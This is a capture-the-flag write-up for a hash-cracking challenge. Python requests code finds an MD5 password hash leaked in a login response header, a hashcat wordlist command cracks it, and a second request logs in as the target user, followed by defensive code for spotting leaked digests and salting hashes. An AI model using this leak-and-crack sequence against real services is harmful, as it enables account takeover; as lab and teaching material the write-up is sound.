Wizer - Challenge 31 - hash cracking

Exploit

import requests

url = "https://chal31-vfdjkb4.vercel.app/api/login"

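# Send a login attempt with a wrong password and inspect the full response
r = requests.post(url, json={
    "userName": "bobs",
    "password": "bajoraz"
})

print(r.status_code)
print(r.text)
print(r.headers)  # the headers include a 'Hashed' value (see response below)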

Response:

401
Invalid user or password
{'Cache-Control': 'public, max-age=0, must-revalidate', 'Content-Length': '24', 'Date': 'Wed, 20 May 2026 16:31:46 GMT', 'Etag': '"wh5pjv6x6o"', 'Hashed': 'b7e283a09511d95d6eac86e39e7942c0', 'Server': 'Vercel', 'Strict-Transport-Security': 'max-age=63072000; includeSubDomains; preload', 'X-Matched-Path': '/api/login', 'X-Vercel-Cache': 'MISS', 'X-Vercel-Id': 'cdg1::iad1::qnpb2-1779294704939-3606141235d3'}

Running hashcat on the hash retrieved from the database, which the server returns in the Hashed response header:

hashcat -a 0 -m 0 hash.txt ~/wordlists/rockyou.txt



b7e283a09511d95d6eac86e39e7942c0:password123!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: b7e283a09511d95d6eac86e39e7942c0

Now we can log in as bobs and get the flag:

import requests

url = "https://chal31-vfdjkb4.vercel.app/api/login"

r = requests.post(url, json={
    "userName": "bobs",
    "password": "password123!"
})

print(r.text)
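
Defender's view of the two flaws used above (a digest leaked in the Hashed header, and unsalted MD5 storage), as an added example that is not part of the original writeup or the challenge's code. All function names are hypothetical, the header sample is a subset of the response shown above, and the PBKDF2 iteration count is an assumed work factor.

```python
import hashlib
import hmac
import os
import re

# Hex runs with the length of an MD5, SHA-1 or SHA-256 digest.
DIGEST_RE = re.compile(r"\b(?:[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})\b")
ITERATIONS = 600_000  # assumed work factor; tune to your own hardware

def find_leaked_digests(headers):
    """Names of response headers whose value contains a digest-length hex string."""
    return [name for name, value in headers.items() if DIGEST_RE.search(value)]

def weak_md5(password):
    """Unsalted MD5: fast, and the same password always yields the same hash."""
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, derived_key) to store per user."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, dk

def verify_password(password, salt, expected):
    """Recompute with the stored salt and compare in constant time."""
    _, dk = hash_password(password, salt)
    return hmac.compare_digest(dk, expected)

# Subset of the headers from the 401 response shown above.
SAMPLE_HEADERS = {
    "Content-Length": "24",
    "Etag": '"wh5pjv6x6o"',
    "Hashed": "b7e283a09511d95d6eac86e39e7942c0",
    "X-Vercel-Id": "cdg1::iad1::qnpb2-1779294704939-3606141235d3",
}

if __name__ == "__main__":
    print("headers leaking a digest:", find_leaked_digests(SAMPLE_HEADERS))
    pw = "constructed-sample-pw"  # constructed value, not from the challenge
    print("md5 repeatable:", weak_md5(pw) == weak_md5(pw))
    salt_a, key_a = hash_password(pw)
    salt_b, key_b = hash_password(pw)
    print("salted hashes differ:", key_a != key_b)
    print("verify ok:", verify_password(pw, salt_a, key_a))
```

The header check is meant for a test suite run against your own API responses; the server never needs to send any form of the stored hash to the client.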